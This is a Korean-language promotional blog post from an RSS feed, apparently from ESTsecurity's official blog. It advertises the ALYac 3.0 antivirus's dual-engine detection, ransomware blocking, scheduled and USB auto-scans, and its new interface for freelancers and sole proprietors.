&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;1,200만 명이 선택한 국민 백신 알약 3.0은 &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;자체 엔진 &lt;b&gt;테라(Tera)와&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;글로벌 보안 엔진 &lt;b&gt;비트디펜더(Bitdefender) &lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;두 엔진을 결합한 듀얼 엔진 구조로 국내외 악성코드를 높은 정확도로 탐지합니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;신종 악성코드와 랜섬웨어까지 행위 기반 탐지 기술로 사전 차단해 전문 지식 없이도 기업 수준의 보안 환경을 유지할 수 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;443&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/7ZgTH/dJMcacImgCB/cIqiXjGA6RZSGF2by7FHs1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/7ZgTH/dJMcacImgCB/cIqiXjGA6RZSGF2by7FHs1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/7ZgTH/dJMcacImgCB/cIqiXjGA6RZSGF2by7FHs1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F7ZgTH%2FdJMcacImgCB%2FcIqiXjGA6RZSGF2by7FHs1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;443&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;443&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p style=&quot;color: #555555; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;또한&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;알약 3.0은 PC에서 이루어지는 활동을 실시간 모니터링하며 악성 행위를 감지하는 즉시 차단합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;다운로드 시도 &amp;rarr; 자동 검사 및 차단&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;의심 프로세스 실행 &amp;rarr; 행위 기반 탐지&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;랜섬웨어 암호화 패턴 감지 &amp;rarr; 사전 차단&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p style=&quot;color: #555555; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;특히 랜섬웨어는 파일 암호화 이전에 특정한 행동 패턴을 보이는데, 알약 3.0은 이를 먼저 탐지해 암호화가 시작되기 전에 프로세스를 차단합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #555555; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;사용자는 별도의 조치를 취하지 않아도 됩니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;업무에 집중하는 동안 알약이 알아서 모든 위협을 차단합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;한 번 설정하면 끝! 모든 점검&amp;middot;차단 작업의 자동화&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;예약 검사 시간만 맞춰두면 정기 점검이 자동으로 실행됩니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;파일 다운로드, 프로그램 설치, USB 연결 등 주요 활동 시에도 자동으로 검사가 이루어지기 때문에 매번 직접 버튼을 눌러야 하는 번거로움이 없습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;443&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bDBokZ/dJMcacImgCC/ubje1wnhPYVKLGftSCxaMK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bDBokZ/dJMcacImgCC/ubje1wnhPYVKLGftSCxaMK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bDBokZ/dJMcacImgCC/ubje1wnhPYVKLGftSCxaMK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbDBokZ%2FdJMcacImgCC%2Fubje1wnhPYVKLGftSCxaMK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;443&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;443&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;보안 전문가들은 최소 주 1회 정기 검사를 권장하지만 매번 기억하기란 쉽지 않죠. 하지만 알약 3.0의 예약 검사 기능은 이 문제를 완벽히 해결다. &lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;설정해둔 시간에 맞춰 자동으로 정밀 검사가 이뤄지며, 위협 발견 시 자동 치료 또는 알림이 제공됩니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;가볍고 빠른 성능으로 업무 방해 없이!&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;알약 3.0은 백그라운드 최적화를 통해 &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;디자인, &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;영상 편집, &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;고용량 파일 작업 &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;등 무거운 작업 환경에서도 느려짐 없이 안정적으로 작동합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;​&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;USB&amp;nbsp;자동&amp;nbsp;검사로&amp;nbsp;외부&amp;nbsp;감염&amp;nbsp;차단&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; background-color: #ffffff; color: #555555; letter-spacing: 0px;&quot;&gt;거래처 USB, 고객 외장하드 등 외부 저장장치는 악성코드 감염률이 높은 경로입니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; background-color: #ffffff; color: #555555; letter-spacing: 0px;&quot;&gt;알약 3.0은 USB&amp;middot;외장하드를 연결하는 즉시 자동 검사를 실행해 눈에 보이지 않는 감염 경로까지 선제적으로 차단합니다.&lt;/span&gt;&lt;/p&gt;
&lt;div id=&quot;SE-19274af4-0063-4b8c-8fe2-af006be1d18f&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;이런 분들께 특히 추천합니다!&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;외부 파일을 자주 받는 프리랜서&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;고객사 PC에서 작업 후 파일을 가져오는 1인 사업자&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;공용 PC&amp;middot;인쇄소 이용이 많은 디자이너&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-7bc66567-8c04-489b-9a3b-dd9eb586a201&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;​&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;한눈에 보기 쉬운 보안 상태&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; background-color: #ffffff; color: #555555; letter-spacing: 0px;&quot;&gt;새로운 알약 3.0은 UI와 UX를 더 직관적으로 개편해 누구나 쉽게 현재 보안 상태를 확인하고 필요한 기능을 바로 사용할 수 있도록 구성했습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-1a598192-3684-42c2-8c05-7e8ba3700f6e&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;464&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bwGQ1o/dJMcacImgCD/dJSiYctbCr30mKDdFbtcyK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bwGQ1o/dJMcacImgCD/dJSiYctbCr30mKDdFbtcyK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bwGQ1o/dJMcacImgCD/dJSiYctbCr30mKDdFbtcyK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbwGQ1o%2FdJMcacImgCD%2FdJSiYctbCr30mKDdFbtcyK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;464&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;464&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-04e271ba-2eca-4055-abfb-07bd22f9c2d7&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;하고 싶은 일에 집중하세요. &lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;보안은 알약이 지켜드립니다.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;1인 사업자에게 시간은 곧 생산성입니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;클릭 한 번으로 자동화된 PC 보안 환경을 만들고, 중요한 업무에만 집중해 보세요. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://bit.ly/48I8W6F&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;알약 3.0&lt;/a&gt; &lt;/b&gt;한 번의 설치로 모든 보안 관리가 자동화됩니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;1,200만 명이 선택한 국민 백신, &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;지금 바로 무료 다운로드하고 강화된 탐지력과 간편한 사용성을 경험해보세요.&lt;/span&gt;&lt;/p&gt;
&lt;p id=&quot;SE-4baa485e-f0d4-4252-80bc-05d8f300bc04&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;​&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-d68681aa-11a2-4c4a-bf21-f5dd8f913f7c&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;&gt;&lt;a href=&quot;https://bit.ly/48I8W6F&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cgIUIc/dJMcahbOWUb/bvz7InVVKr4IlRVaRKYxN1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcgIUIc%2FdJMcahbOWUb%2Fbvz7InVVKr4IlRVaRKYxN1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;773&quot; height=&quot;423&quot; data-origin-width=&quot;773&quot; data-origin-height=&quot;423&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-1ebf6d48-a910-4214-bba2-a85788331e5c&quot; style=&quot;background-color: #ffffff; color: #555555; text-align: left;&quot;&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;p id=&quot;SE-136a7036-ce81-4543-ac6b-57ffd9a85d1e&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;​&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p id=&quot;SE-565aecf4-48c0-4e05-b48d-07a4402e3fe5&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>1인사업자보안</category>
      <category>PC백신</category>
      <category>PC보안</category>
      <category>개인보안</category>
      <category>개인정보보호</category>
      <category>랜섬웨어예방</category>
      <category>알약</category>
      <category>이스트시큐리티</category>
      <category>프리랜서보안</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5686</guid>
      <comments>https://alyacofficialblog.tistory.com/5686#entry5686comment</comments>
      <pubDate>Mon, 8 Dec 2025 10:28:32 +0900</pubDate>
    </item>
  </channel>
</rss>